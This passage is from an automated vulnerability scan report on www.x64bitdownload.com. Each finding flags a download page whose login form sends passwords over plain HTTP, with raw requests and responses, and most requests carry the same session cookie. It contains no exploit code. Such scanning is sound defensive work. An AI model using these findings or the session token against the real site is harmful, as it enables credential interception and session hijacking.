Path:   /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55142


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.256. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57457


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.257. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.258. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:37 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73; expires=Sat, 23 Jul 2011 14:54:37 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.259. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57059


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.260. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.261. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.262. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.263. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.264. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56528


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.265. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.266. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54072


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.267. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.268. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.269. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54477


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.270. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.271. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.272. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.273. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.274. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.275. http://www.x64bitdownload.com/drivers/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /drivers/ HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
